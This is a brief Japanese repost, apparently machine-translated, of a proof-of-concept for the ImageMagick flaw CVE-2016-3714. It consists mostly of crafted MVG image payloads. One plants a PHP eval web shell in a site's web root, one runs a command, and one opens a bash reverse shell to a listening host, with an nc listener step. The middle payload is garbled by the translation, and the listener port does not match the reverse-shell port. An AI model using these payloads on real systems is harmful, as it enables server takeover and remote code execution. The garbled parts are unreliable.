CVE-2016-3714 - ImageMagickのPOC

 実装の場合:

https://wooyun.x10sec.org/static/bugs/wooyun-2016-0205171.html

 

Webのルートディレクトリに単語を書きます:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/1.jpg"|echo \'<?php eval($_POST[\'ant\']);?>\' > shell.php")'
pop graphic-context

ImageMagickのPOC getimagesizeに沿って、同時に、

プッシュグラフィック- コンテキスト ビューボックス0 0 640 480 塗りつぶし'URL(https://127.0.0.0/oops.jpg "|" `id`)' ポップグラフィック- コンテキストの#define xlogo_width 200 の#define xlogo_height 200

     参考ます。https://www.leavesongs.com/PENETRATION/when-imagemagick-meet-getimagesize.html

シェルリバウンド:

 

 

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/1.jpg"|bash -i >& /dev/tcp/192.168.1.101/2333 0>&1")'
pop graphic-context





ポートでリッスン8080のオープン個人VPS

NC -l 8080

 

 

おすすめ

転載: www.cnblogs.com/anbuxuan/p/11825858.html